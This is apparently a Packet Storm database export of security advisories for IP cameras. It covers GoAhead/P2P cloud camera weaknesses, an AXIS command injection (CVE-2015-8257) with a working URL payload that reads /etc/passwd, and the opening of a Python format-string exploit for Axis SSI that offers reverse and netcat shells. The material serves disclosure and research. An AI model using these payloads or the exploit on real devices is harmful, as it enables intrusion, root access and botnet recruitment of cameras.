resources has changed... \nI: Building resources... \nS: WARNING: Could not write to $HOME (/nonexistent), using /tmp instead... 
\nS: Please be aware this is a volatile directory and frameworks \ncould go missing, please utilize --frame-path if the default storage \ndirectory is unavailable \nW: warning: string 'conectar' has no default translation. \nW: warning: string 'str_ipcamfour' has no default translation. \nW: warning: string 'user_pwd_no_show' has no default translation. \nI: Copying libs... (/lib) \nI: Building apk file... \nI: Copying unknown files/dir... \nk% openssl genrsa -out key.pem \n \nGenerating RSA private key, 2048 bit long modulus \n..........................................+++ \n...................................................................+++ \nunable to write 'random state' \ne is 65537 (0x010001) \nk% openssl req -new -key key.pem -out request.pem \n[...] \nk% openssl x509 -req -days 9999 -in request.pem -signkey key.pem \n-out certificate.pem \nSignature ok \nsubject=C = AU, ST = Some-State, O = Internet Widgits Pty Ltd \nGetting Private key \nunable to write 'random state' \nk% openssl pkcs8 -topk8 -outform DER -in key.pem -inform PEM -out \nkey.pk8 -nocrypt \nk% signapk certificate.pem key.pk8 \nobject.p2pwificam.client/dist/object.p2pwificam.client.apk \nsigned-object.p2pwificam.client.apk \nk% ls -latr \ntotal 21560 \ndrwxrwxrwt 3 root root 140 Mar 7 08:25 .. \n-rwx------ 1 nobody nogroup 8488199 Mar 7 08:25 apktool.jar \n-rwx------ 1 nobody nogroup 2319 Mar 7 08:25 apktool \n-rwx------ 1 nobody nogroup 6773051 Mar 7 08:25 \nobject.p2pwificam.client.apk \ndrwx------ 9 nobody nogroup 220 Mar 7 08:33 object.p2pwificam.client \n-rw------- 1 nobody nogroup 1675 Mar 7 08:33 key.pem \n-rw------- 1 nobody nogroup 956 Mar 7 08:33 request.pem \n-rw------- 1 nobody nogroup 1111 Mar 7 08:33 certificate.pem \n-rw------- 1 nobody nogroup 1217 Mar 7 08:33 key.pk8 \ndrwx------ 3 nobody nogroup 220 Mar 7 08:34 . \n-rw------- 1 nobody nogroup 6787146 Mar 7 08:34 \nsigned-object.p2pwificam.client.apk \n \n \n`signed-object.p2pwificam.client.apk` is ready to be used. 
\n \n \nWhen using it, we see that: \n \n \nThe client indeed sends the `system.ini` request within the UDP tunnel: \n \n[please visit the HTML version at \nhttps://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html \nto see the image] \n \n \n \nThe camera indeed receives this request within the UDP tunnel: \n \n[please visit the HTML version at \nhttps://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html \nto see the image] \n \n \n \nThe complete trace is: \n \n[please visit the HTML version at \nhttps://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html \nto see the image] \n \n \nIt appears the pre-auth is not easily reachable within the cloud network. \n \nThis \"cloud\" protocol seems to be more a botnet protocol than a legit \nremote access protocol and does indeed have weaknesses (everything in \nclear-text, i.e. an attacker can attack cameras within the cloud and \nleverage potential access to hack internal networks). \n \nA lot of P2P ('Cloud') cameras are in fact using the same botnet \nprotocols and the same infrastructure, seemingly managed by a \nsingle entity. \n \nWriting a PoC which bruteforces credentials of the remote camera is \nleft as an exercise for the reader. \n \n \n \n## Vendor Response \n \nDue to difficulties in finding and contacting all the vendors, \nfull-disclosure is applied. \n \nI advise to IMMEDIATELY DISCONNECT cameras from the Internet. Hundreds \nof thousands of cameras are affected by the 0day Info-Leak. Millions of \nthem are using the insecure Cloud network. \n \n \n## Report Timeline \n \n* Feb 26, 2017: Vulnerabilities found by Pierre Kim. \n* Mar 08, 2017: A public advisory is sent to security mailing lists. \n \n \n \n## Credits \n \nThese vulnerabilities were found by Pierre Kim (@PierreKimSec). 
\n \n \n \n## References \n \nhttps://pierrekim.github.io/advisories/2017-goahead-camera-0x00.txt \n \nhttps://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html \n \n \n \n## Disclaimer \n \nThis advisory is licensed under a Creative Commons Attribution Non-Commercial \nShare-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/ \n \n \n-- \nPierre Kim \npierre.kim.sec@gmail.com \n@PierreKimSec \nhttps://pierrekim.github.io/ \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/141523/2017-goahead-camera-0x00.txt"}, {"lastseen": "2016-12-05T22:13:54", "description": "", "published": "2016-07-28T00:00:00", "type": "packetstorm", "title": "AXIS Authenticated Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-8257"], "modified": "2016-07-28T00:00:00", "id": "PACKETSTORM:138083", "href": "https://packetstormsecurity.com/files/138083/AXIS-Authenticated-Remote-Command-Execution.html", "sourceData": "` _ _ _ _ _ _ _ _ _ _ \n/ \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ \n( 0 | R | W | 3 | L | L | L | 4 | 8 | 5 ) 
\n\\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \n \nwww.orwelllabs.com \nsecurity advisory \nolsa-2015-8257 \nPGP: 79A6CCC0 \n \n \n \n \n* Advisory Information \n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ \n(+) Title: AXIS Multiple Products Authenticated Remote Command Execution \nvia devtools vector \n(+) Vendor: AXIS Communications \n(+) Research and Advisory: Orwelllabs \n(+) Advisory URL: \nhttp://www.orwelllabs.com/2016/01/axis-commucations-multiple-products.html \n(+) Class: Improper Input Validation [CWE-20] \n(+) CVE Name: CVE-2015-8257 \n(+) Remotely Exploitable: Yes \n(+) Locally Exploitable: No \n(+) OLSA-ID: OWLL2015-8257 \n(+) Affected Versions: Multiple Products/Firmwares (check the list bellow) \n(+) IoT Attack Surface: Device Administrative \nInterface/Authentication/Authorization \n(+) Owasp IoTTop10: I1, I2 \n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ \n \n \n \nVulnerability \n+++++++++++++ \nAXIS Network Cameras (various models/firmwares) are prone to Authenticated \nremote \ncommand execution vulnerability. Exploiting this vulnerability a remote \nattacker can \nforce the execution of certain unauthorized actions, which may lead to \nfurther attacks. 
\n \nTechnical Details \n+++++++++++++++++ \nThe devtools.sh script is responsible for the vulnerability and its 4 \nattack vectors, which are reachable through the following pages: \n \n \nhttp://xxx.xxx.xxx.xxx/app_license.shtml?app= \nhttp://xxx.xxx.xxx.xxx/app_license_custom.shtml?app= \nhttp://xxx.xxx.xxx.xxx/app_index.shtml?app= \nhttp://xxx.xxx.xxx.xxx/app_params.shtml?app= \n \n \nAn attacker can use the app parameter, which expects the name of a \nlegitimate application, to inject commands into the operating system using \n\"%3B\", for example, to read the contents of /etc/passwd: \n \nhttp://xxx.xxx.xxx.xxx/app_license.shtml?app=ORWELLLABS%3Bcat%20/etc/passwd \n \nThe data entered in the \"app=\" parameter is passed without any sanitization to the \ndevtools.sh script located at: {HTMLROOT}/bin/devtools.sh \n \nThis script contains several functions, namely: \n \nlist() \nstatus() \nmenulist() \nmainpagelink() \nSETTINGSLINK() \nconfvariable() \necho_ssivar_licensekey() \nload_auto_inst_form() \n \nWhen these functions are invoked, they interact with the parameters passed \nby the web application through \nthe affected scripts (e.g. app_license.shtml?app=). By injecting the code \nbelow: \n \nhttp://xxx.xxx.xxx.xxx/app_license.shtml?app=ORWELLLABS%3Bcat%20/etc/passwd \n \nThe value passed in \"app\" will be passed directly to the script invoking \ndevtools.sh via /bin/sh -c, as shown in the process listing below (third line, \ninvoking the confvariable function): \n \n[SNIP] \n2039 led 25472 S /usr/bin/enldgts -n \n12014 root 0 SW [kworker/0:0] \n13178 root 2548 S /bin/sh -c /usr/html/bin/devtools.sh \nconfvariable ORW.. \n13183 root 2728 R ps -aux PACKAGENAME \n13312 root 0 SW [kworker/3:1] \n13320 root 0 SW [kworker/2:0] \n[SNIP] \n \nThe value \"ORWELLLABS%3Bcat%20/etc/passwd\" is then passed on to the \ncorresponding function (after passing through a check in \"confvariable()\"). \n \nconfvariable() { \nlocal val= \nif [ -r \"$PACKAGE_DIRECTORY/$1/$ADPPACKCFG\" ]; then \n. 
\"$PACKAGE_DIRECTORY/$1/$ADPPACKCFG\" || : \neval val=\\$$2 \necho $val \nfi \n} \n \n \nThen enter the function \"menulist ()\" which we see the main stretch located \nbetween the lines 127 and 143: \n \n[SNIP] \n127 [ \"$ name\", \"/app_params.shtml\", \"app = $ APPNAME &\" hostA, <! - # If \nexpr = \"\\ $ activeMenu1 = $ APPNAME\" -> true <! - # Else - -> false <! - # \nendif ->, null, \n128 [ \n129 [ \"Settings\", \"/app_params.shtml\", \"app = $ APPNAME &\" hostA, <! - # If \nexpr = \"\\ $ ActivePage = param_ $ APPNAME\" -> true <! - # Else - -> false \n<! - # endif ->, null, []], \n130 EOF \n131 if [-z \"$ LICENSEPAGE\"] || [ \"$ LICENSEPAGE\" axis =]; Then \n132 cat << - EOF \n133 [ \"License\", \"/app_license.shtml\", \"app = $ APPNAME &\" hostA, <! - # If \nexpr = \"\\ $ ActivePage = license_ $ APPNAME\" -> true <! - # Else - -> false \n<! - # endif ->, null, []], \n134 EOF \n135 fi \n136 if [ \"$ LICENSEPAGE\" = custom] && [-r \"$ HTMLROOT / local / $ APPNAME / \nlicense.inc\"]; Then \n137 cat << - EOF \n138 [ \"License\", \"/app_license_custom.shtml\", \"app = $ APPNAME &\" hostA, <! \n- # If expr = \"\\ $ ActivePage custom_ = $ APP NAME\" -> true <! - # Else -> \nfalse <! - # endif ->, null, []], \n139 EOF \n140 fi \n141 if [-r \"$ HTMLROOT / local / $ APPNAME / about.inc\"]; Then \n142 cat << - EOF \n143 [ \"About\", \"/app_index.shtml\", \"app = $ APPNAME &\" hostA, <! - # If \nexpr = \"\\ $ ActivePage = $ APPNAME\" -> true <! - # Else - > false <! - # \nendif ->, null, []], \n \n \nWhere the important lines are the menus below: \n \n \n/bin/devtools.sh (127): \n[ \"$ Name\", \"/app_params.shtml\", \"app = $ APPNAME &\" hostA, <! - # If expr \n= \"\\ $ activeMenu1 = $ APPNAME\" -> true -> false <! - #endif ->, null, \n/bin/devtools.sh (129): \n[ \"Settings\", \"/app_params.shtml\", \"app = $ APPNAME &\" hostA, <! - # If \nexpr = \"\\ $ ActivePage = param_ -> true <! - # Else -> false < ! 
- # endif \n->, null, []], \n/bin/devtools.sh (133): \n[ \"License\", \"/app_license.shtml\", \"app = $ APPNAME &\" hostA, <! - # If \nexpr = \"\\ $ ActivePage = License\" -> true <! - # Else -> false <! - # endif \n->, null, []], \n/bin/devtools.sh (138): \n[ \"License\", \"/app_license_custom.shtml\", \"app = $ APPNAME &\" hostA, <! - # \nIf expr = \"\\ $ ActivePage = APPNAME\" -> true <! - # Else -> false <! - # \nendif ->, null, []], \n/bin/devtools.sh (143): \n[ \"About\", \"/app_index.shtml\", \"app = $ APPNAME &\" hostA, <! - # If expr = \n\"\\ $ ActivePage = $ APPNAME\" - # else -> false <! - # endif ->, null, []], \n \n \nIn PoC presented above, the payload will be triggered in line vector 133 of \ndevtools script ( \"License\" menu) that will: \n \n \n[ \"License\", \"/app_license.shtml\", \"app = ORWELLLABS% 3Bcat% 20 \n/etc/passwd& \"HostA, <! - # If expr =\" \\ $ ActivePage = License \"-> true <! \n- # Else -> false <! - # Endif ->, null, []], \n \nAnd when executed echoes the results on the page. \n \n \nImpact \n++++++ \nThe impact of this vulnerability is that taking into account the busybox \nthat runs behind (and with root privileges everywhere. in all the binaries \nand scripts) is possible to execute arbitrary commands, create backdoors, \nperforming a reverse connection to the machine attacker, use this devices \nas botnets and DDoS amplification methods... the limit is the creativity of \nthe attacker. 
\n \n \nAffected Products \n+++++++++++++++++ \nMultiple Axis Communications Products/Firmware including: \n \n* AXIS Q6032-E/Q6034-E/Q6035-E PTZ Dome Network Camera - \nFirmware 5.41.1.4 \n* AXIS Q6042-E/Q6044-E/Q6045-E PTZ Dome Network Camera - \nFirmware 5.70.1.2 \n* AXIS A8004-VE Network Video Door Station - \nFirmware 5.85.1.1 \n* AXIS P3384 fixed dome Network camera - \nFirmware 6.10.1 \n* AXIS P5532-E PTZ Dome Network Camera - \nFirmware 5.41.3.1 \n* AXIS Q60-E Network Dome PTZ - \nFirmware 5.65.1.1, 5.41.*, 5.70.1.1 \n* AXIS Q7401 Video Encoder - \nFirmware 5.50.4 \n* AXIS Q7404 Video Encoder - \nFirmware 5.50.4.* \n* AXIS Q7406 Blade Video Encoder - \nFirmware 5.51.2 \n* AXIS Q7411 Video Encoder - \nFirmware 5.90.1 \n* AXIS Q7414 Blade Video Encoder - \nFirmware 5.51.2 \n* AXIS Q7424-R Video Encoder - \nFirmware 5.50.4 \n* AXIS Q7424-R Mk II Video Encoder - \nFirmware 5.51.3 \n* AXIS Q7436 Blade Video Encoder - \nFirmware 5.90.1 \n \n \nThe list below shows the affected firmwares (these firmwares are probably \nno longer available, only the latest version of each; if you are not \nsure, check the hash). All these firmwares (in the second column) have the \nsame \"devtools.sh\" shell script (responsible for triggering the RCE \nvulnerability) embedded. The script can be found in the directory: \n\"{HTMLROOT}/bin/devtools.sh\". 
\n \n======================================================================== \nPRODUCT FIRMWARE FIRMWARE HASH \n======================================================================== \nAXIS A8004-VE 5.85.1.1 e666578d7fca54a7db0917839187cd1a \nAXIS A8004-VE 5.85.1 50f114d1169f6fe8dbdadd89ad2e087d \nAXIS F34 5.85.3 7a6ed55038edd8a2fc0f676fb8a04b10 \nAXIS F41 5.85.3 8a089a51a0ecd63543c7883c76db7921 \nAXIS F44 5.85.3 9e3b05625cfe6580ca3e41c5415090e7 \nAXIS M1013 5.50.5.4 231cdd7ba84a383ba7f2237612b1cc12 \nAXIS M1014 5.50.5.4 231cdd7ba84a383ba7f2237612b1cc12 \nAXIS M1025 5.50.5.4 90d59c56171402828fceb7d25b18be2e \nAXIS M1033-W 5.50.5.4 7b96dd594f84fc8c3a4a3ab650434841 \nAXIS M1034-W 5.50.5.4 7b96dd594f84fc8c3a4a3ab650434841 \nAXIS M1054 5.50.3.4 39e279aa2c462e9ec01c7b90f698f76a \nAXIS M1103 5.50.3 c10243b05fe30655ded7a12b998dbf5e \nAXIS M1104 5.50.3 c10243b05fe30655ded7a12b998dbf5e \nAXIS M1113 5.50.3 c10243b05fe30655ded7a12b998dbf5e \nAXIS M1114 5.50.3 c10243b05fe30655ded7a12b998dbf5e \nAXIS M1124 5.75.3.3 f53e0ada9f2e54d2717bf8ad1c7a5928 \nAXIS M1125 5.75.3.3 f53e0ada9f2e54d2717bf8ad1c7a5928 \nAXIS M1143-L 5.60.1.5 367aab0673fc1dec0b972fd80a62e75b \nAXIS M1144-L 5.60.1.5 367aab0673fc1dec0b972fd80a62e75b \nAXIS M1145 5.90.1 ece8f4ccd9d24a01d382798cb7e4a7c7 \nAXIS M1145-L 5.90.1 ece8f4ccd9d24a01d382798cb7e4a7c7 \nAXIS M2014 5.50.6 3ffe1a771565b61567f917621c737866 \nAXIS M3004 5.50.5.4 d65545ef6c03b33b20bf1a04e8216a65 \nAXIS M3005 5.50.5.4 b461fb6e6aab990d3650b48708cee811 \nAXIS M3006 5.70.1.2 b2864dcf48ac83053ba4516a2bda535e \nAXIS M3007 5.75.1.1 a0cc2e9a6ddad758b16f7de518080f70 \nAXIS M3014 5.40.9.5 01d8917c9e60dde7741c4a317044b2f7 \nAXIS M3024-LVE 5.50.5.4 0b91bb66d37e208e130c7eb25099817b \nAXIS M3025-VE 5.50.5.4 751f776668d340edf4149dc116ce26c6 \nAXIS M3026 5.70.1.2 3e78ce4badf994f6d10c5916b6d5513d \nAXIS M3027 5.75.1.1 6d377ea9ea99068e910b416ccc73d8ca \nAXIS M3037 5.75.1.1 ef69c662079018e19e988663ad1fc509 \nAXIS M3113-R 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d 
\nAXIS M3113-VE 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d \nAXIS M3114-R 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d \nAXIS M3114-VE 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d \nAXIS M3203 5.50.3.1 7da467702db8b0e57ea5d237bd10ab61 \nAXIS M3204 5.50.3.1 7da467702db8b0e57ea5d237bd10ab61 \nAXIS M5013 5.50.3.1 9183b9ac91c3c03522f37fce1e6c2205 \nAXIS M5014 5.50.3.1 9183b9ac91c3c03522f37fce1e6c2205 \nAXIS M7010 5.50.4.1 84f618087151b0cc46398a6e0c6ebc0d \nAXIS M7011 5.90.1 362658a55d4f2043ed435c72588bd7e7 \nAXIS M7014 5.50.4.1 84f618087151b0cc46398a6e0c6ebc0d \nAXIS M7016 5.51.2.3 b3de957bbca166f145969a6884050979 \nAXIS P1204 5.50.6 3ffe1a771565b61567f917621c737866 \nAXIS P1214 5.50.6 3ffe1a771565b61567f917621c737866 \nAXIS P1224 5.50.6 3ffe1a771565b61567f917621c737866 \nAXIS P1343 5.40.9.8 9bbd08a92881b1b07e9f497a436b6a60 \nAXIS P1344 5.40.9.8 9bbd08a92881b1b07e9f497a436b6a60 \nAXIS P1346 5.40.9.6 c89ee1e7c54b4728612277e18be1c939 \nAXIS P1347 5.40.9.6 f0f95768e367c3a2a8999a0bd8902969 \nAXIS P1353 5.60.1.5 0f59d0e34301519908754af850fdfebb \nAXIS P1354 5.90.1 120c230067b7e000fa31af674f207f03 \nAXIS P1355 5.60.1.5 5dbec1d7b8b6f337581da6ec668a9aad \nAXIS P1357 5.90.1 d83472c4d545763e5b05cd6d0c63430f \nAXIS P1364 5.85.4 2db00322be0b8c939c89fe4f3e0fd67d \nAXIS P1365 5.75.3.2 1eba3426b2046e696d80ea253fe5e9b6 \nAXIS P1405 5.80.1.1 4db97061feb3cf91eb0cded516f9c5af \nAXIS P1425 5.80.1.1 e9213ed81dc68f07c854a990889995ba \nAXIS P1427 5.80.1.1 dfe4cd28b929e78d42e8fc8c98616a7c \nAXIS P1428-E 5.80.1.1 7a65a0b0e4050824de0d46a1725ad0ea \nAXIS P1435 5.85.4.1 219467e77dcb3195d7203a79ecd30474 \nAXIS P3214 6.10.1 00fca61c0a97dfc5e670a308cbda14d4 \nAXIS P3215 6.10.1 00fca61c0a97dfc5e670a308cbda14d4 \nAXIS P3224 6.10.1.1 5fae8852b7790cf6f66bb2356c60acd6 \nAXIS P3225 6.10.1.1 5fae8852b7790cf6f66bb2356c60acd6 \nAXIS P3301 5.40.9.4 27b7a421f7e3511f3a4b960c80b42c56 \nAXIS P3304 5.40.9.4 df9e2159c4eadf5e955863c7c5691b1a \nAXIS P3343 5.40.9.8 dd752099f8b2c48b91914ec32484f532 \nAXIS P3344 5.40.9.8 
dd752099f8b2c48b91914ec32484f532 \nAXIS P3346 5.50.3.1 d30498356187ba44f94f31398b04a476 \nAXIS P3353 5.60.1.4 fa4924480563924a0365268f8eef8864 \nAXIS P3354 6.10.1 d2f317d88dea1f001ce8151106e0322b \nAXIS P3363 5.60.1.5 4b3175a30893a270e5dca8fc405b5d7e \nAXIS P3364 6.10.1 6128c6ba026a68a5759b08971504807e \nAXIS P3365 6.10.1 f26b0616c595622abb17ce4411dee2b2 \nAXIS P3367 6.10.1 8dad67aae2ffaee6fb147d6942476f00 \nAXIS P3384 6.10.1 138ff1bdc97d025f8f31a55e408e2a1d \nAXIS P3904-R 5.80.1 0b420fa6e8b768cafd6fa6b5920883be \nAXIS P3905-R 5.80.1 0b420fa6e8b768cafd6fa6b5920883be \nAXIS P3915-R 5.80.1 1dcf4a39c7e7349629ade723f563e892 \nAXIS P5414-E 5.90.1 f5782c5dbe8dcffd7863b248a55682ee \nAXIS P5415-E 5.90.1 f5782c5dbe8dcffd7863b248a55682ee \nAXIS P5512 95.50.4.2 a2d5aab90d51af80d924bb3cc8b249fc \nAXIS P5512-E 5.50.4.2 4fd5d721e27fe0f4db7d652bd1730749 \nAXIS P5514-E 5.85.3 b1fc3d26f6293b94f042ac6ea3aa8271 \nAXIS P5515 5.85.3 99b2512b57ed8a12c6ad2e53adc8acf8 \nAXIS P5515-E 5.85.3 639388e504a0841cad2eee7374476727 \nAXIS P5522 5.50.4.3 8335552031bc297ce87666542f0e3106 \nAXIS P5522-E 5.50.4.2 218e1b6997f0e5338f86f0ed1b12f8a0 \nAXIS P5532 5.41.3.1 b1ab3dd8ed126dd68b4793dec9bf3698 \nAXIS P5532-E 5.41.3.1 f6322413687d169dce61459d8338a611 \nAXIS P5534 5.40.9.5 3b94922050bec9bc436dce3fcd9bcfaf \nAXIS P5534-E 5.40.9.6 a931bc58ee0e882b359dbecd3d699c52 \nAXIS P5544 5.41.2.2 cb5bcec36f839914db93eaf17ae83e5e \nAXIS P5624-E 5.75.1.1 b93952a6083aa628026f145a1dffa313 \nAXIS P5635-E 5.75.1.1 24d32e4fab54f16b5698ff4e477fc188 \nAXIS P7210 5.50.4.1 b0e19f8837754ac73aa146b5710a12b1 \nAXIS P7214 5.50.4.1 b0e19f8837754ac73aa146b5710a12b1 \nAXIS P7216 5.51.2.1 a77e96832f7d87970bf286288ce2ca81 \nAXIS P7224 5.51.2.1 5d5ecf065f456e66eb42d9360d22f863 \nAXIS P8514 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d \nAXIS Q1615 5.80.1.3 8d95c0f9f499f29fcfb95419b629ab44 \nAXIS Q1635 5.80.1.3 8d95c0f9f499f29fcfb95419b629ab44 \nAXIS Q1635-E 5.80.1.3 8d95c0f9f499f29fcfb95419b629ab44 \nAXIS Q1755 5.50.4.1 
6ca8597f48ed122ce84c2172c079cdf9 \nAXIS Q1765-LE 5.90.1.1 7930bf5c4c947f2f948f8b7475f01409 \nAXIS Q1765-LE-PT 5.90.1.1 890ba75a8108d97f2ef1a4aecedf76b1 \nAXIS Q1775 5.85.3 f47bc9d46a913561e42b999cc6697a83 \nAXIS Q1910 5.50.4.1 71525d4d56d781318b64e8200806dcf0 \nAXIS Q1921 5.50.4.1 82f956fec96a9068941e24e12045cefd \nAXIS Q1922 5.50.4.1 111a1a4f823e7281af1c872ba52f73c4 \nAXIS Q1931-E 5.75.1.3 5cf13a2c3d65644c3376ec6466dd9b49 \nAXIS Q1931-E-PT-Mount5.75.1.1 3ba7e187dc25e98ab73aef262b68e1b9 \nAXIS Q1932-E 5.75.1.2 b8efe54fc3eca7f2a59322779e63e8e1 \nAXIS Q1932-E PT.Mount5.75.1 513fc031f85542548eeccfeaa7c1a29e \nAXIS Q2901-E 5.55.4.1 d2945717297edab3326179541cfa0688 \nAXIS Q2901-E PT.Mount5.55.4.1 a41aed45359f11d2ec248419c124a52d \nAXIS Q3505 5.80.1.4 9394b3577bdb17cb9f74e56433a0e660 \nAXIS Q3709-PVE 5.75.1.1 e9fb87337c0a24139a40459336f0bcb3 \nAXIS Q6000-E 5.65.1.1 b97df19057db1134a43c26f5ddf484de \nAXIS Q6032 5.41.1.2 8caad5cd7beeebaf5b05b011b8a1e104 \nAXIS Q6032-C 5.41.3 58213a4b1c7a980dcb3b54bbee657506 \nAXIS Q6032-E 5.41.1.4 b4aa977b254694b5d14d7e87e5652a6b \nAXIS Q6034 5.41.1.1 4f44a8661534bac08a50651ee90a7d47 \nAXIS Q6034-C 5.41.3 25d455dc2e2d11639f29b0b381ddd7cb \nAXIS Q6034-E 5.41.1.2 3bfab61354170e42ce27fc2477d57026 \nAXIS Q6035 5.41.1.2 9d124d096bf48fbfd2e11c34de3c880d \nAXIS Q6035-C 5.41.3 42d23ae4d0b1456cc54e54734a586d53 \nAXIS Q6035-E 5.41.1.5 e2123a9e37fda4044847c810b7f25253 \nAXIS Q6042 5.70.1.1 4f253ed4bb0efaa4a845e0e9bd666766 \nAXIS Q6042-C 5.70.1.1 21bd154f706091b348c33dd9564438da \nAXIS Q6042-E 5.70.1.2 9d5dc03268638498d0299bf466fa0501 \nAXIS Q6042-S 5.70.1.1 085fc5903d99899d78b48abb9cafdecd \nAXIS Q6044 5.70.1.1 29e4cdb9ba2f18953512c5d1e17229c1 \nAXIS Q6044-C 5.70.1.1 dc3fc472b88e07278e6ff82eaee71a8d \nAXIS Q6044-E 5.70.1.2 83d1e6c1fe5aa9c26710eed03721f928 \nAXIS Q6044-S 5.70.1.1 654ffd048fdb41ae3c86da4f41e2a31d \nAXIS Q6045 5.70.1.1 2db9b247729e9487f476a35a6dd456ce \nAXIS Q6045-C 5.70.1.1 9bb561126e2b4f69ac526cfccdf254f6 \nAXIS Q6045-C-MkII 5.70.1.1 
2c9efccb0fba0e63fc4fff73e6ba0fea \nAXIS Q6045-E 5.70.1.2 321a5d906863787fdc5e34483e6ec2a8 \nAXIS Q6045-E-MkII 5.70.1.2 d9d4242a83b1ed225dd3c20530da034d \nAXIS Q6045-MkII 5.70.1.1 686f0fe8727e2a726091c9ddf3827741 \nAXIS Q6045-S 5.70.1.1 43473e42f360efb4ea6f84da35fd9746 \nAXIS Q6045-S-Mk-II 5.70.1.1 d747a5a3d69264af8448f72822e8d60b \nAXIS Q6114-E 5.65.2.1 8cb9a3a88c79ebb2cf5def3cda0da148 \nAXIS Q6115-E 5.65.2.1 7d2dd3410ce505cd04a1c182917523a5 \nAXIS Q6128-E 5.85.2.1 49508ff56508f809a75d367896e8d56f \nAXIS Q7401 5.50.4 99855c6c9777fdd5fc5e58349ae861a5 \nAXIS Q7404 5.50.4.2 ffdbee7c9daad303e89a432ba9c4711d \nAXIS Q7404 5.50.4 6e31e9709cf9717968c244267aa8c6d0 \nAXIS Q7406 5.51.2 3cdb7935278157b9c91c334613012b1e \nAXIS Q7411 5.90.1 26893adedcfc1953829084e8e7c3fbdd \nAXIS Q7414 5.51.2 8ff659a8db077b545205f56dfef217d4 \nAXIS Q7424-R 5.50.4 d570ef1886c84ab53934fc51385e8aa7 \nAXIS Q7424-R-MkII 5.51.3 964a13f6b1aef17562cbbde11d936dee \nAXIS Q7436 5.90.1 8fe1ef95b231bf6f771c3edc0fbc8afd \nAXIS Q8414-LVS 6.10.1 9529cd9cf3b3bd66bec22c0b1c7448cd \nAXIS Q8631-E 5.75.1 c7f882afc268ca3d60d07d5770db6a51 \nAXIS Q8632-E 5.75.1 f01d9a86d21335fe3d78e634858b9e77 \nAXIS Q8665-LE 5.90.1.1 1549b56d34250a93bbcf7b24b4f63699 \nAXIS V5915 5.75.1.1 a1c39a9cd545091825001a831d0c1ea4 \n \n \nVendor Information, Solutions and Workarounds \n+++++++++++++++++++++++++++++++++++++++++++++ \nAccording to the Vendor, tickets was opened to correct this issue. \n \nCredits \n+++++++ \nThese vulnerabilities has been discovered and published by Orwelllabs. \n \n \nTimeline \n++++++++ \n2015-09-10: First attempt to contact Vendor \n2015-10-30: Vulnerability was reported to CERT \n2015-11-30: CVE-IDs are assigned \n2016-07-25: Since the first vulnerability was published (09.04.2016 - \nEDB-ID: 39683) \na long conversation revolved around these vulnerabilities with the \nmanufacturer. \nWe maintained communication since 15/04/2016 until now. 
\nAs there is still disagreement regarding vulnerabilities (and botnets in \nthe wild: https://goo.gl/k79I8u), \nwe thought it good to publish this advisory, since it has already exhausted \nall deadlines. \n \n \nLegal Notices \n+++++++++++++ \nThe information contained within this advisory is supplied \"as-is\" with no \nwarranties or guarantees of fitness of use or otherwise. We accept no \nresponsibility for any damage caused by the use or misuse of this \ninformation. \n \n \nAbout Orwelllabs \n++++++++++++++++ \n# Loadind k4fK43sQu3 m0dule... \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/138083/OWLL2015-8257.txt"}, {"lastseen": "2016-11-03T10:24:14", "description": "", "published": "2016-07-18T00:00:00", "type": "packetstorm", "title": "Axis Communications MPQT/PACS SSI Remote Format String / Code Execution", "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-07-18T00:00:00", "id": "PACKETSTORM:137941", "href": "https://packetstormsecurity.com/files/137941/Axis-Communications-MPQT-PACS-SSI-Remote-Format-String-Code-Execution.html", "sourceData": "` \n#!/usr/bin/env python2.7 \n# \n# [SOF] \n# \n# [Remote Format String Exploit] Axis Communications MPQT/PACS Server Side Include (SSI) Daemon \n# Research and development by bashis <mcw noemail eu> 2016 \n# \n# This format string vulnerability has following characteristic: \n# - Heap Based (Exploiting string located on the heap) \n# - Blind Attack (No output the remote attacker)(*) \n# - Remotly exploitable (As anonymous, no credentials needed) \n# \n# (*) Not so 'Blind' after all, since the needed addresses can be predicted by statistic. 
\n# \n# This exploit has following characteristic: \n# - Multiple architecture exploit (MIPS/CRISv32/ARM) [From version 5.20.x] \n# - Modifying LHOST/LPORT in shellcode on the fly \n# - Manual exploiting of remote targets \n# - Simple HTTPS support \n# - Basic Authorization support (not needed for this exploit) \n# - FMS dictionary and predicted addresses for GOT free() / BSS / Netcat shellcode \n# - Multiple shellcodes (ARM, CRISv32, MIPS and Netcat PIPE shell) \n# - Exploiting with MIPS, CRISv32 and ARM shellcode will give shell as root \n# - Exploiting with ARM Netcat PIPE shell give normally shell as Anonymous (5.2x and 5.4x give shell as root) \n# - Multiple FMS exploit techniques \n# - \"One-Write-Where-And-What\" for MIPS and CRISv32 \n# Using \"Old Style\" POP's \n# Classic exploit using: Count to free() GOT, write shellcode address, jump to shellcode on free() call \n# Shellcode loaded in memory by sending shellcode URL encoded, that SSI daemon decodes and keeps in memory. \n# - \"Two-Write-Where-And-What\" for ARM \n# 1) \"Old Style\": Writing 1x LSB and 1x MSB by using offsets for GOT free() target address \n# 2) \"New Style\": ARM Arch's have both \"Old Style\" (>5.50.x) )POPs and \"New Style\" (<5.40.x) direct parameter access for POP/Write \n# [Big differnce in possibilities between \"Old Style\" and \"New Style\", pretty interesting actually] \n# - Another way to POP with \"Old Style\", to be able POPing with low as 1 byte (One byte with %1c instead of eight with %8x) \n# - Exploit is quite well documented \n# \n# Anyhow, \n# Everything started from this simple remote request: \n# \n# --- \n# $ echo -en \"GET /httpDisabled.shtml?&http_user=%p|%p HTTP/1.0\\n\\n\" | netcat 192.168.0.90 80 